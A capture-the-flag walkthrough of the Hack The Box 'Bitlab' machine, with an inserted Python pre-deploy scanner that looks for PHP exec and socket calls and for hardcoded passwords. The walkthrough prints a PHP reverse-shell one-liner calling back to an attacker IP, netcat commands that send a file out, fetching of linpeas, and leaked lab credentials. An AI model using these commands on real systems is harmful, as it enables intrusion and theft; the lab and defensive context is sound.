Here’s how I’ve solved the Bitlab machine on Hack The Box.
As usual, we start off with an nmap scan:
root@kali:~# nmap -p- -sV 10.10.10.114
Nmap scan report for 10.10.10.114
Host is up (0.044s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    nginx
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.44 seconds
The scan shows an nginx web server and SSH. Visiting the web server, we find a Gitlab instance, which developers use to host their source code. I tried searching for exploits but nothing came up.
Logged in as the developer, we find two code repos, Profile and Deploy. We only care about the Profile one: any edit we make to that repo is reflected on the http://10.10.10.114/profile page, because Gitlab auto-deploy is configured that way.
On my attacking machine I run nc -nvlp 8080, and from the PHP web shell on the target we run:
php -r '$sock=fsockopen("ATTACKING_IP", 8080);exec("/bin/sh -i <&3 >&3 2>&3");'
After I get the shell over netcat, I upgrade it to a pty shell with the following command:
python -c 'import pty; pty.spawn("/bin/sh")'
I transferred Linpeas by running python -m SimpleHTTPServer 8080 in the linpeas directory on my attacking machine and wget MY_IP:8080/linpeas.sh on the victim machine.
Linpeas spat out some interesting output, but nothing practical came of it. So I went back to Gitlab and browsed to the snippets section.
There's a script which leaks the password, IP and username of the profiles database. We can use that to query the database ourselves by running this in the shell:
p0wny@shell:/tmp# php -r '$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");$result = pg_query($db_connection, "SELECT * FROM profiles");print_r(pg_fetch_all($result));'
Array
(
    [0] => Array
        (
            [id] => 1
            [username] => clave
            [password] => c3NoLXN0cjBuZy1wQHNz==
        )

)
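Two things made this path possible: pushes to the Profile repo land on the web root with no review, and a snippet carried a database password in clear text. Here is a small pre-deploy gate, written for this writeup as an added example (it is not from the box, from Gitlab, or from the original post), that scans the files a merge would deploy for exactly those two problems. The file contents, paths and function names below are constructed for illustration; the PHP sink and socket function lists are real PHP function names.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# PHP functions that hand a string to a shell or to the interpreter.
EXEC_SINKS = re.compile(
    r"\b(?:exec|shell_exec|system|passthru|popen|proc_open|pcntl_exec|eval)\s*\(",
    re.I,
)
# PHP functions that open an outbound network connection.
NET_PRIMITIVES = re.compile(
    r"\b(?:fsockopen|pfsockopen|stream_socket_client|socket_create|socket_connect)\s*\(",
    re.I,
)
# A password embedded in source, e.g. a libpq/MySQL DSN or a plain assignment.
HARDCODED_CRED = re.compile(r"\bpassword\s*[=:]\s*['\"]?([^\s'\";]+)", re.I)

# Constructed sample tree: what an auto-deployed repo plus a snippet might hold.
SAMPLE_FILES = {
    "profile/index.php": "<?php echo '<h1>Profile</h1>'; ?>",
    "profile/upload.php": (
        "<?php\n"
        "$sock = fsockopen($_GET['h'], 8080);\n"
        "exec('/bin/sh -i <&3 >&3 2>&3');\n"
    ),
    "snippets/postgresql.php": (
        "<?php\n"
        "$db_connection = pg_connect(\"host=localhost dbname=profiles "
        "user=profiles password=profiles\");\n"
    ),
    "profile/README.md": "Pushes to master deploy straight to the web root.",
}


@dataclass(frozen=True)
class Finding:
    path: str
    rule: str
    severity: str
    detail: str


def _mask(secret: str) -> str:
    """Keep the first character so a reviewer can recognise the value without re-leaking it."""
    return secret[:1] + "*" * (len(secret) - 1)


def scan_file(path: str, text: str) -> list[Finding]:
    """Apply the rules to one file and return the findings (hypothetical helper)."""
    findings: list[Finding] = []
    if path.lower().endswith((".php", ".phtml")):
        sinks = [m.group(0) for m in EXEC_SINKS.finditer(text)]
        nets = [m.group(0) for m in NET_PRIMITIVES.finditer(text)]
        if sinks and nets:
            # Socket plus exec in one file is the shape of a reverse shell.
            findings.append(Finding(path, "reverse-shell-pattern", "high",
                                    f"exec sink {sinks[0]} combined with socket call {nets[0]}"))
        elif sinks:
            findings.append(Finding(path, "command-execution", "medium",
                                    f"exec sink {sinks[0]} present"))
    for m in HARDCODED_CRED.finditer(text):
        findings.append(Finding(path, "hardcoded-credential", "high",
                                f"password literal {_mask(m.group(1))}"))
    return findings


def scan_tree(files: dict[str, str]) -> list[Finding]:
    """Scan every file that would be deployed; input is {path: contents}."""
    findings: list[Finding] = []
    for path in sorted(files):
        findings.extend(scan_file(path, files[path]))
    return findings


def deploy_allowed(findings: list[Finding]) -> bool:
    """Policy: any high-severity finding blocks the automatic deploy."""
    return not any(f.severity == "high" for f in findings)


if __name__ == "__main__":
    results = scan_tree(SAMPLE_FILES)
    for f in results:
        print(f"{f.severity:6} {f.rule:22} {f.path}: {f.detail}")
    print("deploy allowed:", deploy_allowed(results))
```

Run as a CI job or a Gitlab push rule, the gate would have stopped both the web shell and the credential-bearing snippet before anything reached /profile; the masking in _mask keeps the finding report itself from becoming another copy of the secret.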
We login via ssh as clave and password: c3NoLXN0cjBuZy1wQHNz==.
In Clave's home dir we find a binary called RemoteConnection.exe; we can transfer it to our attacking machine with the following commands:
# On the attacking machine
root@kali:~# nc -nvlp 8080 > file.exe
# On the victim
clave@bitlab:~$ nc -w 3 10.10.14.19 8080 < RemoteConnection.exe
The root shell is gained by reversing the binary we extracted. Full reversing is not needed; stepping through it in a debugger is enough. For debugging I've used x64dbg.
EAX : 007FF8D0  &"-ssh email@example.com -pw "Qf7]8YSV.wDNF*[7d?j&eD4^""
EBX : 00000000
ECX : 99083A11
EDX : 00F90000
EBP : 007FF8FC
ESP : 007FF844
ESI : 007FF860
EDI : 007FF8D0  &"-ssh firstname.lastname@example.org -pw "Qf7]8YSV.wDNF*[7d?j&eD4^""
EIP : 00FD15E3  bitlabreverseengineering.00FD15E3
Bitlab was an easyish machine but with some weird decisions; for example, Clave's password was hidden as JS in the Help page of the Gitlab instance ???
The PHP auto-deploy was nice, but the reversing part was kinda unnecessary; it would have been much nicer if the reversing were more statically focused rather than dynamic.
Thanks for reading and have a great day! <3